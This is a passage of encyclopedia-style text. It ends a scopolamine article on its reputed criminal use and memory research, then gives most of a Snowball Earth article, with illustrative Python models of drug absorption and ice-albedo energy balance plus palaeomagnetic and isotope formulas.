(transdermal application, on playing cards and papers, etc.) are often exaggerated, especially skin exposure, as the dose that can be absorbed by the skin is too low to have any effect; therapeutic transdermal patches must be worn for hours to days to deliver an effective dose. Other claims about the criminal use of scopolamine also circulate. 
Powdered scopolamine is referred to as "devil's breath". In popular media and television, it is portrayed as a method to brainwash or control people into being defrauded by their attackers; there is debate as to whether these claims are true. Research Scopolamine is used as a research tool to study memory encoding. Initially, in human trials, relatively low doses of the muscarinic receptor antagonist scopolamine were found to induce temporary cognitive deficits. Since then, scopolamine has become a standard drug for experimentally inducing cognitive deficits in animals. Results in primates suggest that acetylcholine is involved in the encoding of new information into long-term memory. Scopolamine has been shown to exert a greater impairment on episodic memory, event-related potentials, memory retention and free recall compared to diphenhydramine (an anticholinergic and antihistamine). Scopolamine produces detrimental effects on short-term memory, memory acquisition, learning, visual recognition memory, visuospatial praxis, visuospatial memory, visuoperceptual function, verbal recall, and psychomotor speed. However, it does not seem to impair recognition or memory retrieval. Acetylcholine projections in hippocampal neurons, which are vital in mediating long-term potentiation, are inhibited by scopolamine. Scopolamine inhibits cholinergic-mediated glutamate release in hippocampal neurons, a process that assists in depolarization, potentiation of action potentials, and synaptic suppression. Scopolamine's effects on acetylcholine and glutamate release in the hippocampus favor retrieval-dominant cognitive functioning. Scopolamine has been used to model deficits in cholinergic function for models of Alzheimer's, dementia, fragile X syndrome, and Down syndrome. Scopolamine has been identified as a psychoplastogen, a compound capable of promoting rapid and sustained neuroplasticity after a single dose. It has been and continues to be investigated as a rapid-onset antidepressant, with many small studies finding positive results, particularly in female subjects. To treat motion sickness, NASA agreed to develop a nasal administration method; with a precise dosage, the NASA spray formulation has been shown to work faster and more reliably than the oral form. Although a fair amount of research has been applied to scopolamine in the field of medicine, its hallucinogenic (psychoactive) effects, as well as those of other antimuscarinic deliriants, have not been as extensively researched or as well understood as those of other types of hallucinogens, such as psychedelic and dissociative compounds, despite the alkaloid's long history of usage in mind-altering plant preparations.
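The pharmacokinetic figures quoted earlier (roughly 45 minutes to peak plasma concentration, a 5-hour average half-life, and 20–40% oral bioavailability) can be tied together with a standard one-compartment model. The sketch below is illustrative only: the absorption rate constant ka is not reported in the text and is chosen here so that the predicted peak lands near 45 minutes, and concentrations are left in arbitrary units.

```python
import math

# Reported figures from the text: ~5 h elimination half-life, peak plasma
# concentration around 45 minutes, oral bioavailability 20-40%.
T_HALF = 5.0                  # hours
F = 0.3                       # bioavailability (midpoint of 20-40%, assumed)
ke = math.log(2) / T_HALF     # first-order elimination rate constant, 1/h
ka = 5.0                      # absorption rate constant, 1/h -- NOT from the
                              # text; chosen so the predicted peak is ~45 min

def concentration(t):
    """One-compartment oral model (Bateman function), arbitrary units.

    Dose over volume of distribution is normalised to 1, so only the
    shape of the curve is meaningful, not absolute concentrations.
    """
    return F * ka / (ka - ke) * (math.exp(-ke * t) - math.exp(-ka * t))

t_max = math.log(ka / ke) / (ka - ke)                  # time of peak
print(f"predicted peak at {t_max * 60:.0f} minutes")   # ~44 min
for t in (1.0, 5.0, 10.0):
    print(f"C({t} h) = {concentration(t):.3f}")
```

With these assumptions the model reproduces the reported peak time and shows the concentration falling by half every 5 hours once absorption is complete.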
Physical sciences
Alkaloids
Chemistry
28982
https://en.wikipedia.org/wiki/Snowball%20Earth
Snowball Earth
The Snowball Earth is a geohistorical hypothesis that proposes that during one or more of Earth's icehouse climates, the planet's surface became nearly entirely frozen with no liquid oceanic or surface water exposed to the atmosphere. The most widely discussed such episode of global glaciation is believed to have occurred some time before 650 million years ago, during the Cryogenian period, which included at least two large glacial periods, the Sturtian and Marinoan glaciations. Proponents of the hypothesis argue that it best explains sedimentary deposits that are generally believed to be of glacial origin at tropical palaeolatitudes and other enigmatic features in the geological record. Opponents of the hypothesis contest the geological evidence for global glaciation and the geophysical feasibility of an ice- or slush-covered ocean, and they emphasize the difficulty of escaping an all-frozen condition. Several unanswered questions remain, including whether Earth was a full "snowball" or a "slushball" with a thin equatorial band of open (or seasonally open) water. The Snowball Earth episodes are proposed to have occurred before the sudden radiations of multicellular life forms known as the Avalon and Cambrian explosions; the most recent Snowball episode may have triggered the evolution of multicellularity. History First evidence for ancient glaciation Long before the idea of a global glaciation was first proposed, a series of discoveries accumulated evidence for ancient Precambrian glaciations. The first of these discoveries was published in 1871 by J. Thomson, who found ancient glacier-reworked material (tillite) in Islay, Scotland. Similar findings followed in Australia (1884) and India (1887). A fourth and very illustrative finding, which came to be known as "Reusch's Moraine," was reported by Hans Reusch in northern Norway in 1891. Many other findings followed, but their understanding was hampered by the rejection, at the time, of continental drift. Global glaciation proposed Douglas Mawson, an Australian geologist and Antarctic explorer, spent much of his career studying the stratigraphy of the Neoproterozoic in South Australia, where he identified thick and extensive glacial sediments. As a result, late in his career, he speculated about the possibility of global glaciation. Mawson's ideas of global glaciation, however, were based on the mistaken assumption that the geographic positions of Australia, and of the other continents where low-latitude glacial deposits are found, had remained constant through time. With the advancement of the continental drift hypothesis, and eventually plate tectonic theory, came an easier explanation for the glaciogenic sediments—they were deposited at a time when the continents were at higher latitudes. In 1964, the idea of global-scale glaciation reemerged when W. Brian Harland published a paper in which he presented palaeomagnetic data showing that glacial tillites in Svalbard and Greenland were deposited at tropical latitudes. From these data, and the sedimentological evidence that the glacial sediments interrupt successions of rocks commonly associated with tropical to temperate latitudes, he argued that an ice age occurred that was so extreme that it resulted in marine glacial rocks being deposited in the tropics. In the 1960s, Mikhail Budyko, a Soviet climatologist, developed a simple energy-balance climate model to investigate the effect of ice cover on global climate. 
Using this model, Budyko found that if ice sheets advanced far enough out of the polar regions, a feedback loop ensued in which the increased reflectiveness (albedo) of the ice led to further cooling and the formation of more ice, until the entire Earth was covered in ice and stabilized in a new ice-covered equilibrium. While Budyko's model showed that this ice-albedo stability could happen, he concluded that it had, in fact, never happened, as his model offered no way to escape from such a feedback loop. In 1971, Aron Faegre, an American physicist, showed that a similar energy-balance model predicted three stable global climates, one of which was snowball Earth. This model introduced Edward Norton Lorenz's concept of intransitivity, indicating that there could be a major jump from one climate to another, including to snowball Earth. The term "snowball Earth" was coined by Joseph Kirschvink in a short paper published in 1992 within a lengthy volume concerning the biology of the Proterozoic eon. The major contributions from this work were: (1) the recognition that the presence of banded iron formations is consistent with such a global glacial episode, and (2) the introduction of a mechanism by which to escape from a completely ice-covered Earth—specifically, the accumulation of CO2 from volcanic outgassing leading to an ultra-greenhouse effect. Franklyn Van Houten's discovery of a consistent geological pattern in which lake levels rose and fell is now known as the "Van Houten cycle". His studies of phosphorus deposits and banded iron formations in sedimentary rocks made him an early adherent of the snowball Earth hypothesis, which postulates that the planet's surface froze more than 650 million years ago. Interest in the notion of a snowball Earth increased dramatically after Paul F. Hoffman and his co-workers applied Kirschvink's ideas to a succession of Neoproterozoic sedimentary rocks in Namibia and elaborated upon the hypothesis in the journal Science in 1998 by incorporating such observations as the occurrence of cap carbonates. In 2010, Francis A. Macdonald, assistant professor at Harvard in the Department of Earth and Planetary Sciences, and others, reported evidence that Rodinia was at equatorial latitude during the Cryogenian period with glacial ice at or below sea level, and that the associated Sturtian glaciation was global. Evidence The snowball Earth hypothesis was originally devised to explain geological evidence for the apparent presence of glaciers at tropical latitudes. According to modelling, an ice–albedo feedback would result in glacial ice rapidly advancing to the equator once the glaciers spread to within 25° to 30° of the equator. Therefore, the presence of glacial deposits within the tropics suggests global ice cover. Critical to an assessment of the validity of the theory, therefore, is an understanding of the reliability and significance of the evidence that led to the belief that ice ever reached the tropics. This evidence must prove three things: that a bed contains sedimentary structures that could have been created only by glacial activity; that the bed lay within the tropics when it was deposited; and that glaciers were active at different global locations at the same time, with no other deposits of the same age in existence. This last point is very difficult to prove. Before the Ediacaran, the biostratigraphic markers usually used to correlate rocks are absent; therefore there is no way to prove that rocks in different places across the globe were deposited at the same time. 
The best that can be done is to estimate the age of the rocks using radiometric methods, which are rarely accurate to better than a million years or so. The first two points are often the source of contention on a case-by-case basis. Many glacial features can also be created by non-glacial means, and estimating the approximate latitudes of landmasses even as recently as 200 Ma can be riddled with difficulties. Palaeomagnetism The snowball Earth hypothesis was first posited to explain what were then considered to be glacial deposits near the equator. Since tectonic plates move slowly over time, ascertaining their position at a given point in Earth's long history is not easy. In addition to considerations of how the recognizable landmasses could have fit together, the latitude at which a rock was deposited can be constrained by palaeomagnetism. When sedimentary rocks form, magnetic minerals within them tend to align with Earth's magnetic field. Through the precise measurement of this palaeomagnetism, it is possible to estimate the latitude (but not the longitude) where the rock matrix was formed. Palaeomagnetic measurements have indicated that some sediments of glacial origin in the Neoproterozoic rock record were deposited within 10 degrees of the equator, although the accuracy of this reconstruction is in question. This palaeomagnetic location of apparently glacial sediments (such as dropstones) has been taken to suggest that glaciers extended from land to sea level in tropical latitudes at the time the sediments were deposited. It is not clear whether this implies a global glaciation or the existence of localized, possibly land-locked, glacial regimes. Others have even suggested that most data do not constrain any glacial deposits to within 25° of the equator. Skeptics suggest that the palaeomagnetic data could be corrupted if Earth's ancient magnetic field was substantially different from today's. Depending on the rate of cooling of Earth's core, it is possible that during the Proterozoic, the magnetic field did not approximate a simple dipolar distribution, with north and south magnetic poles roughly aligning with the planet's axis as they do today. Instead, a hotter core may have circulated more vigorously and given rise to four, eight or more poles. Palaeomagnetic data would then have to be re-interpreted, as the sedimentary minerals could have aligned pointing to a "west pole" rather than the north magnetic pole. Alternatively, Earth's dipolar field could have been oriented such that the poles were close to the equator. This hypothesis has been posited to explain the extraordinarily rapid motion of the magnetic poles implied by the Ediacaran palaeomagnetic record; the alleged motion of the north magnetic pole would occur around the same time as the Gaskiers glaciation. Another weakness of reliance on palaeomagnetic data is the difficulty in determining whether the magnetic signal recorded is original, or whether it has been reset by later activity. For example, a mountain-building orogeny releases hot water as a by-product of metamorphic reactions; this water can circulate to rocks thousands of kilometers away and reset their magnetic signature. This makes the authenticity of the magnetic signature of rocks older than a few million years difficult to determine without painstaking mineralogical observations. Moreover, further evidence is accumulating that large-scale remagnetization events have taken place which may necessitate revision of the estimated positions of the palaeomagnetic poles. 
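The latitude estimates above rest on the geocentric axial dipole assumption, under which the magnetic inclination I recorded in a rock relates to the palaeolatitude λ by the standard dipole formula:

$$\tan I = 2 \tan \lambda$$

A shallow inclination of about 20°, for example, corresponds to a palaeolatitude of only $\arctan(\tan 20^\circ / 2) \approx 10^\circ$, which is how near-horizontal remanent magnetization in glacial sediments is read as near-equatorial deposition. The worked number here is an illustration, not a measurement from a specific deposit.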
There is currently only one deposit, the Elatina deposit of Australia, that was indubitably deposited at low latitudes; its depositional date is well-constrained, and the signal is demonstrably original. Low-latitude glacial deposits Sedimentary rocks that are deposited by glaciers have distinctive features that enable their identification. Long before the advent of the snowball Earth hypothesis, many Neoproterozoic sediments had been interpreted as having a glacial origin, including some apparently at tropical latitudes at the time of their deposition. However, many sedimentary features traditionally associated with glaciers can also be formed by other means. Thus the glacial origin of many of the key occurrences for snowball Earth has been contested. As of 2007, there was only one "very reliable"—still challenged—datum point identifying tropical tillites, which makes statements of equatorial ice cover somewhat presumptuous. However, evidence of sea-level glaciation in the tropics during the Sturtian glaciation is accumulating. Evidence of possible glacial origin of sediment includes: Dropstones (stones dropped into marine sediments), which can be deposited by glaciers or other phenomena. Varves (annual sediment layers in periglacial lakes), which can form at higher temperatures. Glacial striations (formed by embedded rocks scraped against bedrock): similar striations are from time to time formed by mudflows or tectonic movements. Diamictites (poorly sorted conglomerates). Originally described as glacial till, most were in fact formed by debris flows. Open-water deposits It appears that some deposits formed during the snowball period could only have formed in the presence of an active hydrological cycle. Bands of glacial deposits up to 5,500 meters thick, separated by small (meters) bands of non-glacial sediments, demonstrate that glaciers melted and re-formed repeatedly for tens of millions of years; solid oceans would not permit this scale of deposition. It is considered possible that ice streams such as seen in Antarctica today could have caused these sequences. Further, sedimentary features that could only form in open water (for example: wave-formed ripples, far-traveled ice-rafted debris and indicators of photosynthetic activity) can be found throughout sediments dating from the snowball-Earth periods. While these may represent "oases" of meltwater on a completely frozen Earth, computer modelling suggests that large areas of the ocean must have remained ice-free, arguing that a "hard" snowball is not plausible in terms of energy balance and general circulation models. Carbon isotope ratios There are two stable isotopes of carbon in sea water: carbon-12 (12C) and the rare carbon-13 (13C), which makes up about 1.109 percent of carbon atoms. Biochemical processes, of which photosynthesis is one, tend to preferentially incorporate the lighter 12C isotope. Thus ocean-dwelling photosynthesizers, both protists and algae, tend to be very slightly depleted in 13C, relative to the abundance found in the primary volcanic sources of Earth's carbon. Therefore, an ocean with photosynthetic life will have a lower 13C/12C ratio within organic remains and a higher ratio in corresponding ocean water. The organic component of the lithified sediments will remain very slightly, but measurably, depleted in 13C. Silicate weathering, an inorganic process by which carbon dioxide is drawn out of the atmosphere and deposited in rock, also fractionates carbon. 
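The per mil (‰) figures used in this and the following sections are delta values, conventionally measured against a reference standard (VPDB for carbon):

$$\delta^{13}\mathrm{C} = \left( \frac{\left({}^{13}\mathrm{C}/{}^{12}\mathrm{C}\right)_{\text{sample}}}{\left({}^{13}\mathrm{C}/{}^{12}\mathrm{C}\right)_{\text{standard}}} - 1 \right) \times 1000\ \text{‰}$$

A negative δ13C therefore means the sample is depleted in 13C relative to the standard, as expected for carbon that has passed through photosynthetic organisms.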
The emplacement of several large igneous provinces shortly before the Cryogenian, and the subsequent chemical weathering of the enormous continental flood basalts they created, is also believed to have caused a major positive shift in carbon isotopic ratios and contributed to the beginning of the Sturtian glaciation; this weathering was aided by the breakup of Rodinia, which exposed many of the flood basalts to warmer, moister conditions closer to the coast and so accelerated their chemical weathering. During the proposed episode of snowball Earth, there are rapid and extreme negative excursions in the ratio of 13C to 12C. Close analysis of the timing of 13C 'spikes' in deposits across the globe allows the recognition of four, possibly five, glacial events in the late Neoproterozoic. Banded iron formations Banded iron formations (BIF) are sedimentary rocks of layered iron oxide and iron-poor chert. In the presence of oxygen, iron naturally rusts and becomes insoluble in water. The banded iron formations are commonly very old and their deposition is often related to the oxidation of Earth's atmosphere during the Palaeoproterozoic era, when dissolved iron in the ocean came in contact with photosynthetically produced oxygen and precipitated out as iron oxide. The bands were produced at the tipping point between an anoxic and an oxygenated ocean. Since today's atmosphere is oxygen-rich (nearly 21% by volume) and in contact with the oceans, it is not possible to accumulate enough iron oxide to deposit a banded formation. The only extensive iron formations that were deposited after the Palaeoproterozoic (after 1.8 billion years ago) are associated with Cryogenian glacial deposits. For such iron-rich rocks to be deposited there would have to be anoxia in the ocean, so that much dissolved iron (as ferrous iron) could accumulate before it met an oxidant that would precipitate it as ferric oxide. For the ocean to become anoxic it must have limited gas exchange with the oxygenated atmosphere. Proponents of the hypothesis argue that the reappearance of BIF in the sedimentary record is a result of limited oxygen levels in an ocean sealed by sea-ice. Near the end of a glaciation, the reestablishment of gas exchange between the ocean and the atmosphere would oxidise the seawater rich in ferrous iron. A positive shift in δ56FeIRMM-014 from the lower to upper layers of Cryogenian BIFs may reflect an increase in ocean acidification, as the upper layers were deposited as more and more oceanic ice cover melted away and more carbon dioxide was dissolved by the ocean. Opponents of the hypothesis suggest that the rarity of the BIF deposits may indicate that they formed in inland seas. Being isolated from the oceans, such lakes could have been stagnant and anoxic at depth, much like today's Black Sea; a sufficient input of iron could provide the necessary conditions for BIF formation. A further difficulty in suggesting that BIFs marked the end of the glaciation is that they are found interbedded with glacial sediments; such interbedding has been suggested to be an artefact of Milankovitch cycles, which would have periodically warmed the seas enough to allow gas exchange between the atmosphere and ocean and precipitate BIFs. Cap carbonate rocks Around the top of Neoproterozoic glacial deposits there is commonly a sharp transition into a chemically precipitated sedimentary limestone or dolomite metres to tens of metres thick. 
These cap carbonates sometimes occur in sedimentary successions that have no other carbonate rocks, suggesting that their deposition is a result of a profound aberration in ocean chemistry. These cap carbonates have an unusual chemical composition, as well as strange sedimentary structures that are often interpreted as large ripples. The formation of such sedimentary rocks could be caused by a large influx of positively charged ions, as would be produced by rapid weathering during the extreme greenhouse following a snowball Earth event. The δ13C isotopic signature of the cap carbonates is near −5‰, consistent with the value of the mantle—such a low value could be taken to signify an absence of life, since photosynthesis usually acts to raise the value; alternatively, the release of methane deposits could have lowered it from a higher value and counterbalanced the effects of photosynthesis. The mechanism involved in the formation of cap carbonates is not clear, but the most cited explanation suggests that at the melting of a snowball Earth, water would dissolve the abundant CO2 from the atmosphere to form carbonic acid, which would fall as acid rain. This would weather exposed silicate and carbonate rock (including readily attacked glacial debris), releasing large amounts of calcium, which when washed into the ocean would form distinctively textured layers of carbonate sedimentary rock. Such an abiotic "cap carbonate" sediment can be found on top of the glacial till that gave rise to the snowball Earth hypothesis. However, there are some problems with the designation of a glacial origin to cap carbonates. The high carbon dioxide concentration in the atmosphere would cause the oceans to become acidic and dissolve any carbonates contained within—starkly at odds with the deposition of cap carbonates. The thickness of some cap carbonates is far above what could reasonably be produced in the relatively quick deglaciations. The case is further weakened by the lack of cap carbonates above many sequences of clear glacial origin at a similar time and the occurrence of similar carbonates within the sequences of proposed glacial origin. An alternative mechanism, which may have produced the Doushantuo cap carbonate at least, is the rapid, widespread release of methane. This accounts for the incredibly low δ13C values—as low as −48‰—as well as unusual sedimentary features which appear to have been formed by the flow of gas through the sediments. Changing acidity Isotopes of boron suggest that the pH of the oceans dropped dramatically before and after the Marinoan glaciation. This may indicate a buildup of carbon dioxide in the atmosphere, some of which would dissolve into the oceans to form carbonic acid. Although the boron variations may be evidence of extreme climate change, they need not imply a global glaciation. Space dust Earth's surface is very depleted in iridium, which primarily resides in Earth's core. The only significant source of the element at the surface is cosmic particles that reach Earth. During a snowball Earth, iridium would accumulate on the ice sheets, and when the ice melted the resulting layer of sediment would be rich in iridium. An iridium anomaly has been discovered at the base of the cap carbonate formations and has been used to suggest that the glacial episode lasted for at least 3 million years, but this does not necessarily imply a global extent to the glaciation; indeed, a similar anomaly could be explained by the impact of a large meteorite. 
Cyclic climate fluctuations Using the ratio of mobile cations to those that remain in soils during chemical weathering (the chemical index of alteration), it has been shown that chemical weathering varied in a cyclic fashion within a glacial succession, increasing during interglacial periods and decreasing during cold and arid glacial periods. This pattern, if a true reflection of events, suggests that the "snowball Earths" bore a stronger resemblance to Pleistocene ice age cycles than to a completely frozen Earth. In addition, glacial sediments of the Port Askaig Tillite Formation in Scotland clearly show interbedded cycles of glacial and shallow marine sediments. The significance of these deposits is highly reliant upon their dating. Glacial sediments are difficult to date, and the closest dated bed to the Port Askaig group is 8 km stratigraphically above the beds of interest. Its dating to 600 Ma means the beds can be tentatively correlated to the Sturtian glaciation, but they may represent the advance or retreat of a snowball Earth. Mechanisms The initiation of a snowball Earth event would involve some initial cooling mechanism, which would result in an increase in Earth's coverage of snow and ice. The increase in Earth's coverage of snow and ice would in turn increase Earth's albedo, which would result in positive feedback for cooling. If enough snow and ice accumulated, runaway cooling would result. This positive feedback is facilitated by an equatorial continental distribution, which would allow ice to accumulate in the regions closer to the equator, where solar radiation is most direct. Many possible triggering mechanisms could account for the beginning of a snowball Earth, such as the eruption of a supervolcano, a reduction in the atmospheric concentration of greenhouse gases such as methane and/or carbon dioxide, changes in solar energy output, or perturbations of Earth's orbit. Regardless of the trigger, initial cooling results in an increase in the area of Earth's surface covered by ice and snow, and the additional ice and snow reflects more solar energy back to space, further cooling Earth and further increasing the area of Earth's surface covered by ice and snow. This positive feedback loop could eventually produce a frozen equator as cold as modern Antarctica. Global warming associated with large accumulations of carbon dioxide in the atmosphere over millions of years, emitted primarily by volcanic activity, is the proposed trigger for melting a snowball Earth. Due to positive feedback for melting, the eventual melting of the snow and ice covering most of Earth's surface would require as little as a millennium. Initiation of glaciation A tropical distribution of the continents is, perhaps counter-intuitively, necessary to allow the initiation of a snowball Earth. Tropical continents are more reflective than open ocean and so absorb less of the Sun's heat: most absorption of solar energy on Earth today occurs in tropical oceans. Further, tropical continents are subject to more rainfall, which leads to increased river discharge and erosion. When exposed to air, silicate rocks undergo weathering reactions which remove carbon dioxide from the atmosphere. 
These reactions proceed in the general form: rock-forming mineral + CO2 + H2O → cations + bicarbonate + SiO2. An example of such a reaction is the weathering of wollastonite: CaSiO3 + 2 CO2 + H2O → Ca2+ + 2 HCO3− + SiO2. The released calcium cations react with the dissolved bicarbonate in the ocean to form calcium carbonate as a chemically precipitated sedimentary rock. This transfers carbon dioxide, a greenhouse gas, from the air into the geosphere, and, in steady-state on geologic time scales, offsets the carbon dioxide emitted from volcanoes into the atmosphere. As of 2003, a precise continental distribution during the Neoproterozoic was difficult to establish because there were too few suitable sediments for analysis. Some reconstructions point towards polar continents—which have been a feature of all other major glaciations, providing a point upon which ice can nucleate. Changes in ocean circulation patterns may then have provided the trigger of snowball Earth. Additional factors that may have contributed to the onset of the Neoproterozoic snowball include the introduction of atmospheric free oxygen, which may have reached sufficient quantities to react with methane in the atmosphere, oxidizing it to carbon dioxide, a much weaker greenhouse gas, and a younger—thus fainter—Sun, which would have emitted 6 percent less radiation in the Neoproterozoic. Normally, as Earth gets colder due to natural climatic fluctuations and changes in incoming solar radiation, the cooling slows these weathering reactions. As a result, less carbon dioxide is removed from the atmosphere and Earth warms as this greenhouse gas accumulates—this 'negative feedback' process limits the magnitude of cooling. During the Cryogenian, however, Earth's continents were all at tropical latitudes, which made this moderating process less effective, as high weathering rates continued on land even as Earth cooled. This caused ice to advance beyond the polar regions. Once ice advanced to within 30° of the equator, a positive feedback could ensue such that the increased reflectiveness (albedo) of the ice led to further cooling and the formation of more ice, until the whole Earth was ice-covered. Polar continents, because of low rates of evaporation, are too dry to allow substantial carbon deposition—restricting the amount of atmospheric carbon dioxide that can be removed from the carbon cycle. A gradual rise of the proportion of the isotope 13C relative to 12C in sediments pre-dating "global" glaciation indicates that CO2 draw-down before snowball Earths was a slow and continuous process. The start of a snowball Earth is marked by a sharp downturn in the δ13C value of sediments, a hallmark that may be attributed to a crash in biological productivity as a result of the cold temperatures and ice-covered oceans. In January 2016, Gernon et al. proposed a "shallow-ridge hypothesis" involving the breakup of Rodinia, linking the eruption and rapid alteration of hyaloclastites along shallow ridges to massive increases in alkalinity in an ocean with thick ice cover. Gernon et al. demonstrated that the increase in alkalinity over the course of glaciation is sufficient to explain the thickness of cap carbonates formed in the aftermath of Snowball Earth events. Dating of the Sturtian glaciation's onset has found it to be coeval with the emplacement of a large igneous province in the tropics. Weathering of this equatorial large igneous province is believed to have drawn enough carbon dioxide out of the air to enable the development of major glaciation. 
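The ice-albedo runaway described in this section can be made concrete with a zero-dimensional energy-balance model in the spirit of Budyko's. The sketch below is purely illustrative: the albedo values, ramp temperatures, and effective emissivity are round numbers chosen to produce the classic three-equilibrium structure, not values from the text.

```python
import numpy as np

# Zero-dimensional energy-balance model in the spirit of Budyko (1960s).
# All parameter values below are illustrative choices, not data from the text.
S0 = 1361.0        # solar constant, W/m^2
SIGMA = 5.67e-8    # Stefan-Boltzmann constant, W/m^2/K^4
EPS = 0.61         # effective emissivity standing in for the greenhouse effect

def albedo(T):
    """Planetary albedo: icy below 250 K, warm above 280 K, linear in between."""
    return np.clip(0.65 - (0.65 - 0.30) * (T - 250.0) / 30.0, 0.30, 0.65)

def net_flux(T):
    """Absorbed shortwave minus emitted longwave, W/m^2."""
    return S0 / 4.0 * (1.0 - albedo(T)) - EPS * SIGMA * T**4

# Scan for equilibria (sign changes of the net flux).
T = np.linspace(200.0, 320.0, 12001)
f = net_flux(T)
roots = T[:-1][np.sign(f[:-1]) != np.sign(f[1:])]
for r in roots:
    # Stable if the planet warms below the root and cools above it.
    stable = net_flux(r + 0.5) < 0 < net_flux(r - 0.5)
    print(f"equilibrium near {r:6.1f} K ({'stable' if stable else 'unstable'})")
```

With these numbers the model finds a stable "snowball" state near 242 K, an unstable threshold near 260 K, and a stable warm state near 288 K: once cooling pushes the climate past the unstable branch, the albedo feedback carries it all the way to the frozen state, exactly the runaway the text describes.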
During the frozen period Global temperature fell so low that the equator was as cold as modern-day Antarctica. This low temperature was maintained by the high albedo of the ice sheets, which reflected most incoming solar energy into space. A lack of heat-retaining clouds, caused by water vapor freezing out of the atmosphere, amplified this effect. Degassing of carbon dioxide has been speculated to have been unusually low during the Cryogenian, enabling the persistence of global glaciation. Breaking out of global glaciation The carbon dioxide levels necessary to thaw Earth have been estimated as being 350 times what they are today, about 13% of the atmosphere. Since Earth was almost completely covered with ice, carbon dioxide could not be withdrawn from the atmosphere by release of alkaline metal ions weathering out of siliceous rocks. Over 4 to 30 million years, enough CO2 and methane, mainly emitted by volcanoes but also produced by microbes converting organic carbon trapped under the ice into the gas, would accumulate to finally cause enough greenhouse effect to make surface ice melt in the tropics until a band of permanently ice-free land and water developed; this would be darker than the ice and thus absorb more energy from the Sun—initiating a "positive feedback". The first areas to become free of permanent ice cover may have been in the mid-latitudes rather than in the tropics, because a rapid hydrological cycle would have inhibited the melting of ice at low latitudes. As these mid-latitude regions became ice free, dust from them blew over onto ice sheets elsewhere, decreasing their albedo and accelerating the process of deglaciation. Destabilization of substantial deposits of methane hydrates locked up in low-latitude permafrost may also have acted as a trigger and/or strong positive feedback for deglaciation and warming. Methanogens were an important contributor to the deglaciation of the Marinoan Snowball Earth. The return of high primary productivity in surficial waters fueled extensive microbial sulphur reduction, causing deeper waters to become highly euxinic. Euxinia caused the formation of large amounts of methyl sulphides, which in turn were converted into methane by methanogens. A major negative nickel isotope excursion confirms high methanogenic activity during this period of deglaciation and global warming. On the continents, the melting of glaciers would release massive amounts of glacial deposits, which would erode and weather. The resulting sediments supplied to the ocean would be high in nutrients such as phosphorus, which, combined with the abundance of CO2, would trigger a cyanobacterial population explosion, which would cause a relatively rapid reoxygenation of the atmosphere and may have contributed to the rise of the Ediacaran biota and the subsequent Cambrian explosion—a higher oxygen concentration allowing large multicellular lifeforms to develop. Although the positive feedback loop would melt the ice in geologically short order, perhaps less than 1,000 years, replenishment of atmospheric oxygen and depletion of the CO2 levels would take further millennia. It is possible that carbon dioxide levels fell enough for Earth to freeze again; this cycle may have repeated until the continents had drifted to more polar latitudes. More recent evidence suggests that with colder oceanic temperatures, the resulting greater ability of the oceans to dissolve gases led to the carbon content of sea water being more quickly oxidized to carbon dioxide. 
This leads directly to an increase of atmospheric carbon dioxide, enhanced greenhouse warming of Earth's surface, and the prevention of a total snowball state. Over millions of years, cryoconite would have accumulated on and inside the ice. Psychrophilic microorganisms, volcanic ash and dust from ice-free locations would settle on ice covering several million square kilometers. Once the ice started to melt, these layers would become visible and darken the icy surfaces, helping to accelerate the process. Also, ultraviolet light from the Sun produced hydrogen peroxide (H2O2) when it hit water molecules. Normally H2O2 breaks down in sunlight, but some would have been trapped inside the ice. When the glaciers started to melt, it would have been released into both the ocean and the atmosphere, where it was split into water and oxygen molecules, increasing atmospheric oxygen. Slushball Earth hypothesis While the presence of glaciers is not disputed, the idea that the entire planet was covered in ice is more contentious, leading some scientists to posit a "slushball Earth", in which a band of ice-free, or ice-thin, waters remains around the equator, allowing for a continued hydrologic cycle. This hypothesis appeals to scientists who observe certain features of the sedimentary record that can only be formed under open water or rapidly moving ice (which would require somewhere ice-free to move to). Recent research observed geochemical cyclicity in clastic rocks, showing that the snowball periods were punctuated by warm spells, similar to ice age cycles in recent Earth history. Attempts to construct computer models of a snowball Earth have struggled to accommodate global ice cover without fundamental changes in the laws and constants which govern the planet. A less extreme snowball Earth hypothesis involves continually evolving continental configurations and changes in ocean circulation. Synthesised evidence has produced slushball Earth models where the stratigraphic record does not permit postulating complete global glaciations. Kirschvink's original hypothesis had recognised that warm tropical puddles would be expected to exist in a snowball Earth. A more extreme hypothesis, the Waterbelt Earth hypothesis, suggests that ice-free areas of ocean continued to exist even as tropical continents were glaciated. Scientific dispute The argument against the hypothesis is evidence of fluctuations in ice cover and melting recorded within "snowball Earth" deposits. Evidence for such melting comes from evidence of glacial dropstones, geochemical evidence of climate cyclicity, and interbedded glacial and shallow marine sediments. A longer record from Oman, constrained to 13°N, covers the period from 712 to 545 million years ago—a time span containing the Sturtian and Marinoan glaciations—and shows both glacial and ice-free deposition. The snowball Earth hypothesis does not explain the alternation of glacial and interglacial events, nor the oscillation of ice-sheet margins. There have been difficulties in recreating a snowball Earth with global climate models. Simple GCMs with mixed-layer oceans can be made to freeze to the equator; a more sophisticated model with a full dynamic ocean (though only a primitive sea ice model) failed to form sea ice to the equator. In addition, the levels of CO2 necessary to melt a global ice cover have been calculated to be 130,000 ppm, which is considered by some to be unreasonably large. 
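The two figures quoted for deglaciation—"350 times what they are today" and 130,000 ppm—are mutually consistent if "today" is read as roughly 370 ppm, about the atmospheric CO2 concentration around the time such estimates were published (the reference value is an assumption here):

$$350 \times 370\ \text{ppm} \approx 130{,}000\ \text{ppm} \approx 13\%\ \text{of the atmosphere}$$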
Strontium isotopic data have been found to be at odds with proposed snowball Earth models of silicate weathering shutdown during glaciation and rapid rates immediately post-glaciation. Therefore, methane release from permafrost during marine transgression was proposed to be the source of the large measured carbon excursion in the time immediately after glaciation. "Zipper rift" hypothesis Nick Eyles suggests that the Neoproterozoic Snowball Earth was in fact no different from any other glaciation in Earth's history, and that efforts to find a single cause are likely to end in failure. The "zipper rift" hypothesis proposes that two pulses of continental "unzipping"—first the breakup of Rodinia, forming the proto-Pacific Ocean; then the splitting of the continent Baltica from Laurentia, forming the proto-Atlantic—coincided with the glaciated periods. The associated tectonic uplift would form high plateaus, just as the East African Rift is responsible for high topography; this high ground could then host glaciers. Banded iron formations have been taken as unavoidable evidence for global ice cover, since they require dissolved iron ions and anoxic waters to form; however, the limited extent of the Neoproterozoic banded iron deposits means that they may have formed in inland seas rather than in frozen oceans. Such seas can experience a wide range of chemistries; high rates of evaporation could concentrate iron ions, and a periodic lack of circulation could allow anoxic bottom water to form. Continental rifting, with associated subsidence, tends to produce such landlocked water bodies. This rifting, and associated subsidence, would produce the space for the fast deposition of sediments, negating the need for an immense and rapid melting to raise the global sea levels. High-obliquity 